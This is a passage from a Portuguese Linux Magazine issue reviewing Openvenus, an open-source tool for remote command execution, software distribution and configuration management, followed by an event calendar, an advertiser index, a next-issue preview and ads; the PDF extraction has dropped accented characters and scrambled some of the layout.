faz a verificao em um repositrio e pode ento usar ovrapply para
execut-los no lado do cliente. O
comando ovrapply usa lotes por padro, mas possvel desabilitar a
opo com o parmetro -N.
Nos clientes, o servio ovpoll
consulta o servidor para ver se as
tarefas esto pendentes. Alternativamente, ovqpush desencadeia uma
fila de execuo no servidor. Para
as filas, podemos usar comandos
para listar os trabalhos em curso
e excluir trabalhos. O servidor no
tenta por conta prpria reiniciar
um trabalho que falhou, mas podemos fazer isso com um push ou
pull agendado via cronjob.

Distribuio
de software
Alm de realizar trabalhos com uma
API prpria, um segundo recurso
importante do Openvenus a distribuio de software. O software
suporta atualmente pacotes Solaris,
pacotes Linux no formato RPM e
tarballs. Antes que o usurio possa distribuir o software, precisar
verific-lo no servidor Openvenus.
Depois disso, o sistema lista, instala
ou cancela os pacotes na requisio.
Manter os arquivos de configurao proporciona uma fonte constante de trabalho. Se um servio
em um servidor for modificado,

Quadro 1: Instalao

O software est disponvel online [3] como um pacote de cdigo fonte. Para projetar e operar o
Openvenus, necessrio um sistema operacional com capacidade de multithread, como o Linux, alm de
Perl, OpenSSL e a biblioteca de utilitrios Afbackup [3]; a biblioteca do mesmo autor do Openvenus.
No laboratrio, os testes revelaram que no uma boa ideia simplesmente executar ./configure && make
&& make install. Em vez disso, use make rpms como o terceiro passo e instale os pacotes que este passo cria.
A razo que os RPMs transportam scripts de ps-instalao que, em particular, tornam muito mais fcil
provisionar o servidor que o mecanismo de make install.

76

www.linuxmagazine.com.br

Figura 2 Aqui, o Openvenus controla a execuo de um comando


no venusclient.

ser preciso deixar algumas centenas de clientes na rede. O Openvenus gera um repositrio para
esses arquivos de configurao;
hosts podem ser adicionados aos
grupos com os mesmos arquivos
de configurao, como arquivos
especficos para Solaris ou Linux.
Para editar os arquivos de configurao, ser preciso verificar
o arquivo, alter-lo e verifica-lo
novamente. Como o repositrio
inclui controle de verso, configurao de rollbacks so possveis.
O controle de verso tambm se
aplica aos mtodos.
O comando ovpdistfile, em seguida, distribui o arquivo para um
grupo de clientes. O Openvenus faz
os lotes das tarefas se os clientes
individuais na lista de grupos no
estiverem disponveis, pacotes e
mtodos diversos podem ser combinados em um meta-pacote para
permitir que o Openvenus distribua
pacotes consistentes. A API tambm
fornece um recurso separado que
transfere os arquivos para o cliente
quando o mtodo executado. Este
recurso especialmente til quando um servio no possui apenas
um, mas vrios arquivos de configurao que sempre precisam ser
alterados juntos. Todas as aes
so registradas pelo Openvenus,
de forma que os administradores
possam controlar quem fez o qu
e quando.

Linux Magazine #108 | Fevereiro de 2014

API para mtodos

Os mtodos usam a API para


acessar o framework. Scripts
Bash so o padro para o Openvenus, mas outras linguagens
tambm so permitidas, desde
que suportem o mecanismo #!.
Mais especificamente, o Openvenus aceita scripts no formato:
#! <Interpreter>: <Program>

Este mtodo funciona at mesmo em sistemas Windows que


no entendem #! nativamente.
Scripts que so executados
no framework podem referenciar um conjunto de variveis
de ambiente que so internas
do Openvenus. Alm disso, os
administradores podem passar
suas prprias variveis de ambiente atravs de uma declarao de configurao. A descrio
da API identifica uma srie de
funes de utilitrios, tais como
os de instalao de pacotes ou
acesso a informaes do Openvenus. Falando em descries:
a documentao Openvenus
aceitvel como uma referncia,
mas no necessariamente facilita
a introduo ao programa.

Concluso

Em grandes redes com vrios


sistemas operacionais em uso, o
scVenus e seu descendente em

cdigo aberto Openvenus realmente mostram a que vieram. Uma


vantagem do Openvenus o suporte para sistemas operacionais
bastante antigos, que remontam
ao SunOS 4, substitudo pela Sun
em meados da dcada de 1990.
A master principal executa comandos e scripts e distribui arquivos de software e configurao. Os
administradores podem agrupar
clientes; o Openvenus tambm
identifica automaticamente a
arquitetura e o sistema operacional. Como muitas caractersticas
so baseadas em scripts, elas so
fceis de entender e projetadas
para permitir que o administrador as personalize e desenvolva.
O Openvenus tambm vem com
dependncias mnimas. Por exemplo, uma instalao Ruby, exigida
pelo Puppet, no necessria.
Outros frameworks impressionam com mais recursos e uma
grande comunidade que oferece
receitas pr-compiladas para tarefas padro. A funo do Openvenus, por outro lado, algo que os
administradores podem entender.
Usurios antigos do scVenus que
ainda possuem scripts personalizados e querem continuar a us-los
podem contar com os benefcios
oferecidos pelo Openvenus. n

Mais informaes
[1] scVenus: http://www.scien
cecomputing.de/en/software/
systemmanagement.html
[2] Openvenus: http://source
forge.net/projects/openvenus/
[3] Afbackup: http://sourcefor
ge.net/projects/afbackup/

Gostou do artigo?
Queremos ouvir sua opinio.
Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9103

77

Servios
Calendrio de eventos
Evento

Data

InterCon WordPress

31 de maio

ndice de anunci
Local

InterContinental Hotel Alameda Santos, 1.123

Empresa

Pg.

Supermicro

02

Altabooks

11

Alfresco

14

Unodata

20

Plus Server

InterCon PHP

InterCon Android

19 de julho

13 de setembro

InterContinental Hotel Alameda Santos, 1.123

InterContinental Hotel Alameda Santos, 1.123

22, 23

Sesc

27

Uol Cloud

29

Kontroller

43

Apiki

47

SpagoBi

55

netRevenda

58

Central Server

81

WatchGuard

83

Agora voc tem o controle sobre


o desempenho do seu negcio
sempre sua mo.

Soluo completa hospedada


em nuvem (Cloud Computing)

SOFTWARE

80

Saiba mais em:


www.vectory.com.br
+55 11 3104 6652

A soluo de gesto integrada ADempiere um poderoso


sistema ERP, CRM e SCM de Cdigo Aberto, que conta com
um conjunto completo de recursos, organizados atravs de
processos de negcios. Essa organizao resulta em uma
plataforma nica, totalmente integrada e consistente, proporcionando aos usurios uma viso integral de sua empresa e
permitindo uma anlise em 360 graus de todo o relacionamento
com clientes, fornecedores e colaboradores.
www.linuxmagazine.com.br

Preview

Linux Magazine #109


Bancos de Dados
Na prxima edio da Linux Magazine,
vamos apresentar os mais recentes
recursos da mais nova verso do
PostgreSQL.
Conhea ainda ferramentas para
replicao de dados, tunning e
sincronizao de informaes em
bancos de dados instalados em
diferentes servidores.
Segurana de dados, programao e
muito mais, na prxima edio.
No perca! n

Admin Magazine #11


Virtualizao de Desktop
Quais so as reais vantagens de possuir um desktop virtualizado? Quais
so os reais benefcios de manter a
infraestrutura de usurio virtualizada
a este nvel? Estas e outras perguntas
sero repondidas na prxima edio
da Admin Magazine, onde voc ir
aprender como funciona e como manter uma insfraestrutura de desktops
virtualizados utilizando as mais modernas ferramentas de virtualizao
disponveis no mercado. n

82

www.linuxmagazine.com.br

Voc refm da Operadora de Telecom?


Altos custos de conectividade impedem sua empresa de ter links redundantes.

No pule no vazio! Achar que


a segurana simples o
comeo de seus problemas!

Alugue um Firewall
gerenciado a partir
de R$ 300,00/ms.

um erro, total e comum,


achar que qualquer um na
sua TI pode fazer gesto de
segurana da sua rede!

Controle de Contedo e Antivrus,


Solues Antispam, implementadas
localmente ou na nuvem,
Proteo de Invases e Ataques,
Balanceamento de Links e Servidores,
Anlise de Vulnerabilidades e Riscos,
Conectividade entre Sites, Fornecedores, etc.
Conectividade Segura para Usurios Mveis,
Otimizao de Links,
Controle de Navegao,
Controle de Aplicaes,

vendas@altermedios.com.br

(11) 3393.3340

Das könnte Ihnen auch gefallen